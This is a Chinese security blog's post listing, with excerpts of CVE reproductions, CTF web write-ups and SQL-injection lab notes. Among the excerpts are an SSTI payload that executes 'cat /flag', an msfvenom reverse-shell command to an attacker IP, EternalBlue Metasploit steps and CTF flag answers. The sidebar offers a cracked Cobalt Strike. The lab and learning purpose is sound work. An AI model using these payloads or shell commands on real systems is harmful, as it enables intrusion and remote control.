自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(94)
  • 资源 (6)
  • 收藏
  • 关注

原创 通过使用Portainer来管理Docke环境以及使用私人镜像仓库

Portainer & Docker

2022-11-02 19:02:13 2487

原创 CVE-2021-3156 Sudo溢出漏洞复现

CVE-2021-3156漏洞介绍Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论

2021-01-31 11:30:04 2888 2

原创 CVE 2019-11043 php fastcgi 远程命令执行漏洞

CVE 2019-11043一、漏洞介绍二、漏洞名称三、漏洞类型四、漏洞危害:五、漏洞来源:六、公布时间:七、涉及应用版本:八、修复版本:九、应用语言:十、漏洞复现:一、漏洞介绍nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info,却没有if(!-f documentrootdocument_rootdocumentr​ootfastcgi_script_name){return 404;}的时候就会导致远程代码执行。二、漏洞名称php f

2021-01-05 15:06:04 1399

原创 [BJDCTF2020] web题-Cookie is so stable

酷炫的欢迎界面,有1个flag.php和hint.phphint.php的页面元素发现了提示去flag.php发现存在模板注入然后提示说研究cookie,使用payloadpayload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}...

2020-12-31 15:58:09 312

原创 [安洵杯 2019] web题-easy_web

嘻嘻发现url存在base64加密,尝试解密得到了加密规则,解密出来是图片的名字555.pngbase64->base64->hexTXpVek5UTTFNbVUzTURabE5qYz0->MzUzNTM1MmU3MDZlNjc=->3535352e706e67->555.png得到了加密规则,将index.php加密抓包得到源码hex->base64->base64最后加密完成是:TmprMlJUWTBOalUzT0RKRk56QTJPRGN3访.

2020-12-31 11:44:10 1147

原创 [BSidesCF 2019] web题-Kookie

开题以后是这样的一个界面,提示说找到了两个账户一个是cookie和monster。flag:flag{d3a403f9-9627-428d-8dbd-01b5ef49148a}

2020-12-31 10:29:58 224

原创 [b01lers2020] web题-Welcome to Earth

开题以后会一直跳转到/die/抓包查看获得了一个/chase/的路径继续查看得到了一串字符,可以发现flag被打乱了用脚本给组合一下from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)for a in item: k = ''.join(list(a)).

2020-12-30 17:50:14 465

原创 [WesternCTF2018] web题-shrine

开题即送源码一份import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config@app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径def shrine(shrine): def safe_j

2020-12-30 14:14:34 306 3

原创 [GYCTF2020] web题-Ezsqli

这题一直出问题,用脚本跑到一半都会崩。后面换了一个,能够跑出来。详细情况可以看看Ying师傅的bloghttps://www.gem-love.com/ctf/1782.html我把跑出来的代码贴出来可以参考下# coding:utf-8 import requestsimport timeurl = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/'def str_hex(s): #十六进制转换 fl ==>

2020-12-30 11:49:50 519

原创 [NCTF2019] web题-SQLi

访问robots.txt发现hint.txt继续访问hint.txt得到过滤信息根据过滤信息写脚本进行注入import requestsimport stringfrom urllib import parsepasswd = ''string = string.ascii_lowercase + string.digits + '_'url = 'http://7a1bc649-4a1d-4e5b-a7cd-cb187958a399.node3.buuoj.cn/index.ph.

2020-12-30 10:15:41 247

原创 分享一个实用的Linux的安全基线检查

这个脚本主要是用于检查Linux系统的一些基础配置是否存在危险,能够快速的发现问题,定位问题,目前功能还不够全面,后面慢慢完善。喜欢安全的朋友可以微信关注Gamma安全实验室公众号,里面有很多高质量文章以及免费的学习资料。#! /bin/bash ####################################### Linux主机安全基线检查# Date:2020-12-23# 使用前请给文件执行权限:chmod u+x check.sh# 如提示找不到文件 在vi编辑模式下 set

2020-12-23 15:12:59 1683 3

原创 vulnstack域环境靶场(四)

环境搭建进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下:sudo suubuntudocker-compose builddocker-compose up环境全部开启效果如下:信息搜集通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了...

2020-12-09 22:34:41 1530 7

原创 vulnstack域环境靶场(三)

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar

2020-12-01 17:57:23 888 2

原创 vulnstack域环境靶场(一)

一、环境介绍:1.拓扑结构2.环境搭建这里我多使用了一个win7的虚拟机作为攻击机,使用的vm1网卡。二、信息搜集1.敏感信息泄漏phpinfo默认页面2.数据库弱口令3.目录爆破三、漏洞利用1.利用phpmyadmin日志写入shell2.利用网站后台getshell访问该网站以后发现公告信息处有信息泄漏点击前台模板进入以后点击新建,可以写入一个shell,也可以直接修改当前的模板不知道目录路径,百度一下yxcms的目录3.上传cs后门设置好监听

2020-11-08 11:10:04 1268

原创 python爬虫学习(xpath)

xpath解析:最常用且最便捷高效的一种解析方式。- xpath解析原理1.实例化一个etree的对象,且需要将被解析的页面源码数据加载到该对象中。2.调用etree对象中的xpath方法结合着xpath表达式实现标签的定位和内容的捕获。- 环境安装pip install lxml- 如何实例化一个etree对象:from lxml import etree1.将本地的html文档中的源码数据加载etree对象中:etree.parse(filePath)2.可以将从网站获取的源码数据加载

2020-10-26 08:59:45 239

原创 python爬虫学习(scrapy)

scrapy框架什么是框架就是一个集成了很多功能并且具有很强通用性的一个项目模板。如何学习框架专门学习框架封装的各种功能的详细用法。什么是scrapy爬虫中封装好的一个明星框架。功能介绍;高性能的持久化存储异步的数据下载高性能的数据解析操作分布式……scrapy框架的基本使用环境安装:mca or linux:pip install scrapywindows:pip install wheel下载twisted,地址:https

2020-10-25 22:53:00 175

原创 python爬虫学习(requests模块)

requests模块介绍:- python中原生的一款基于网络请求的模块,功能非常强大,简单便捷,效率极高。作用:模拟浏览器发请求。如何使用:(requests模块的编码流程)- 指定url- 发起请求- 获取响应数据- 持久化存储环境安装:- pip install requests练习:1.爬取搜狗首页的页面数据# 需求:爬取搜狗首页数据import requests# -指定urlurl = 'https://www.sogou.com/'# 发起请求respon

2020-10-21 21:43:45 412

原创 CVE 2017-7494 Samba远程代码执行漏洞

1. 漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。以下Samba版本受到影响:– 3.5.0- 4.6.4– 3.5.0- 4.5.10– 3.5.0- 4.4.142. 复现环境靶机:使用vulhub进行环境搭建攻击机:kali3. 漏洞复现1.运行测试环境docker-compose up -d2.使用kali msf框架msf5 > use exploit/lin

2020-10-20 10:01:18 942

原创 CVE 2017-8917 Joomla3.7 Core com_fields组件sql注入漏洞复现

1. 漏洞描述漏洞编号: CVE-2017-8917危害等级:危急漏洞简述:本漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入,sql注入对导致数据库中的敏感信息泄漏。影响版本: Joomla!3.7.0 Core2. 漏洞介绍这个漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄

2020-10-19 11:22:22 2531

原创 CVE 2017-11882 office缓存溢出漏洞复现

1.漏洞概述针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。这里是poc地址https://github.com/unamer/CVE-2017-118822.影响版本office 2003office 2007office 2010office 2013office 20163.复现环境渗透机:kali + POC代码【上述github地址】靶机

2020-10-15 20:44:25 557

原创 CVE 2017-10271漏洞复现(写入webshell)

1.简介Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐2.复现环境可自建也可以使用vulhub和docker快速搭建环境3.漏洞复现访问http://IP:7001/,看到一个not found页面即启动成功漏洞触发的位置是在wls-wsat/CoordinatorPortType这个目录下,访问该目录进行截获数据包,修改为POST传递参数,写入成功后,访问

2020-10-14 10:19:23 1228

原创 redis 未授权漏洞以及利用

1.redis 介绍REmote DIctionary Server(Redis) 是完全开源免费的,遵守BSD协议,Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。Redis 与其他的key - value 缓存产品有以下三个特点:1.Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。2.Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。3

2020-10-11 14:29:58 542

原创 [GKCTF2020] web题-cve版签到

复现环境是:buuoj.cn会提示是cve 2020-7066点击这个View CTFHub,观察url地址栏,会出现一个ssrf类型的漏洞在检查网络状况里面发现有一个hint根据首页提示去构造一个payload?url =https://127.0.0.1%00.ctfhub.comtips提示最后必须是123结尾顺利拿到flagflag{8c5bd6ea-057e-46e3-9b00-4b30dc5f7610}CVE-2020-7066PHP 7.2.29之前的7.2.x

2020-10-10 16:52:09 305

原创 CVE 2020-1472 Netlogon 特权提升漏洞

1.复现环境DC:os:windows 2012 serverip:192.168.236.132攻击机:os:kaliip:192.168.236.1302.影响版本Windows Server 2008 R2 for x64-based SystemsService Pack 1Windows Server 2008 R2 for x64-basedSystems Service Pack 1 (Server Core installation)Windows Server 201

2020-10-07 16:37:34 299

原创 CVE-2020-0796 SMBv3漏洞复现过程

1.扫描主机是否存在漏扫描py文件链接2.下载可利用的POCpoc地址3.在kali里使用msfvenom生成shell,lhost是攻击机ipmsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换5.进入msf开启监听use exploit/mu

2020-10-07 13:27:46 268

原创 ms08067web-PUT

使用burp修改为PUT方式,并传递参数将得到的base64解密得到flagMS08067{76097a2f47164aedb5744854021d1eba}也可以用python脚本来实现import base64import requestsurl = 'http://106.52.110.188:21028/'r = requests.session()a = r.put(url=url,data='MS08067')base= base64.b64decode(a.conte.

2020-09-28 11:09:49 364

原创 ms08067实验室web-不安全的验证方式

抓包修改cook值,将值改为admin得到flagMS08067{85a032a7f35a4131800305b0497ad077}

2020-09-28 09:43:13 216

原创 ms08067实验室web-vim

访问.index.php.swp得到源码这题跟i春秋一题一样直接贴出脚本得到flagfrom requests import postpayload = {'greeting':'Merry Christmas'+'a' * 1000000}r = post('http://106.52.110.188:21028//index.php',data=payload)print(res.text)得到flagMS08067{5c5766918ed846e3a7e44948f0fed385.

2020-09-28 09:34:31 386 1

原创 ms08067实验室web靶场-Command

打开环境与dvwa的命令注入有点像这里过滤了很多,尝试用%0a来突破能够正常执行命令以后,到根目录去寻找flag直接cat读取flag得到flagMS08067{0d07a0895471478280dd7effeb530ae7}

2020-09-28 09:13:43 887

原创 Cobalt Strike 设置上线使用微信推送(Server酱)

先看看设置好后的效果~http://sc.ftqq.com/3.version 使用github账号登录,将生成的SCKEY码保存好,并开通微信推送。复制下面代码保存为 http_ftqq.cna 文件。修改url变量里的参数。# 循环获取所有beaconon beacon_initial { sub http_get { local('$output'); $url = [new java.net.URL: $1]; $strea

2020-09-16 17:34:04 1263

原创 sqli-labs闯关记录(Less38-Less45)

Stacked injectionsLess-38 stacked QueryLess-39 stacked Query Intiger typeLess-40 stacked Query String type BlindLess-41 stacked Query Intiger type blindLess-42 Stacked Query error basedLess-43 Stacked QueryLess-44 Stacked Query blindLess-45 Stacked Query B

2020-09-08 15:01:04 175

原创 sqli-labs闯关记录(Less32-Less37)

Advanced InjectionsLess-32 Bypass addslashes()Less-33 Bypass addslashes()Less-34 Bypass Add SLASHESLess-35 why care for addslashes()Less-36 Bypass MySQL Real Escape StringLess-37 MySQL_real_escape_stringLess-32 Bypass addslashes()payload:?id=-1%df%27unio

2020-09-08 11:23:25 273

原创 sqli-labs闯关记录(Less26-Less31)

Advanced InjectionsLess-29 WAF PROTECTLess-30 WAF PROTECTLess-31 WAF PROTECTLess 29-31搭建方法:1.下载JSPstudy,安装到与PHPstudy同级目录2.将sqli-labs目录下的tomcat-flies,解压至JSPstudy>www目录下,打开index.jsp,查看路径是否则正确3.修改JSPstudy端口为8080,PHPstudy端口为80814.访问端口8080下的Less-29,

2020-09-08 10:28:11 233

原创 sqli-labs闯关记录(Less21-Less25)

Advanced InjectionsLess-21 Cookie Injection- Error Based- complex - stringLess-22 Cookie Injection- Error Based- Double Quotes - stringLess-23 Error Based- no commentsLess-24 Second Degree InjectionsLess-25 Trick with OR & ANDLess-25a Trick with OR &am

2020-09-04 17:06:15 250

原创 sqli-labs闯关记录(Less16-Less20)

Basic InjectionLess-16 Blind-Time Based-Double quotes-StringLess-17 Update Query-Error based-StringLess-18Less-16 Blind-Time Based-Double quotes-StringLess-17 Update Query-Error based-Stringuname无法注入,passwd注入Less-18

2020-09-04 15:20:57 173

原创 phpstudy(小皮)默认配置解析漏洞

1.官网下载小皮面板2.本地安装3.漏洞复现在www目录下新建test.txt文件,写入phpinfo函数访问test.txt文件调入exp修复建议:1.等待官方升级2.更换为Apache或者装waf进行拦截3.将php-fpm.conf中的security.limit_extensions后面的值设置为.php...

2020-09-03 20:50:55 1245

原创 宝塔7.4.2漏洞复现

复现地址:本机环境复现版本:7.4.6破解到7.4.2访问bt面板现在的版本是7.4.6,这个是在网上找的破解版,能够复现7.4.2的漏洞输入ip:端口/pma 就直接进入到了phpmyadmin,正常情况下是访问不到的官方修复建议是升级,此次影响的版本是linux面板7.4.2,windows面板6.8,并且安装了phpmyadmin,或者禁止访问888端口...

2020-08-24 21:33:17 1436

原创 DVWA全系列笔记

文章目录一、DVWA的安装二、漏洞学习2.1 Brute Force2.1.1 Brute Force(low)2.1.2 Brute Force(Medium)2.1.3 Brute Force(High)2.2 Command Injection(命令注入)2.2.1 Command Injection(Low)2.2.2 Command Injection(Medium)2.2.3 Command Injection(High)2.3 Csrf(跨站请求伪造)2.3.1 Csrf(Low)2.3.2

2020-08-21 13:36:11 5316 1

原创 [BJDCTF 2nd] web题-假猪套天下第一

复现环境:buuoj.cn出题人是y1ng师傅~使用admin登录有提示框。使用其他账号登录获取数据包发现有其他页面访问这个页面翻译过来,意思是抱歉,此网站将在99年后开放!抓包发现有时间戳,把时间戳时间添加100年修改时间戳重发以后会提示Sorry, this site is only optimized for those who comes from localhost意思是只能本地用户访问添加Client-ip进行绕过添加Referer继续这里是个UA,替换U

2020-08-20 16:48:26 450

原创 漏洞复现永恒之蓝MS-17010+修复

攻击机:192.168.20.101靶机:192.168.20.103使用msf的扫描模块,扫描靶机是否存在漏洞use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103run使用攻击载荷进行攻击use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.20.10

2020-08-20 14:43:37 1746 1

hackbar2.1.3-master.zip

这是hackbar的老版本,在github上也可以下载,主要是在插件的页面取消自动更新,就可以免费使用。

2020-07-07

cobaltstrike4.0-cracked.zip

这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。

2020-07-04

upload2019.rar

upload-2019,该环境是用于练习文件上传漏洞的,通过该环境的练习能够使自己更加牢固的掌握文件上传的漏洞原理以及运用

2020-06-25

pikachu-master.zip

Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。

2020-06-25

xss-labs.zip

xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。

2020-06-25

SQL注入练习.rar

sql-labs,该环境可以用来练习sql注入。是闯关类型的一个靶场环境,从易到难,从简到繁。将每一关都闯过的话,对于sql注入的理解会比较深入。

2020-06-25

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除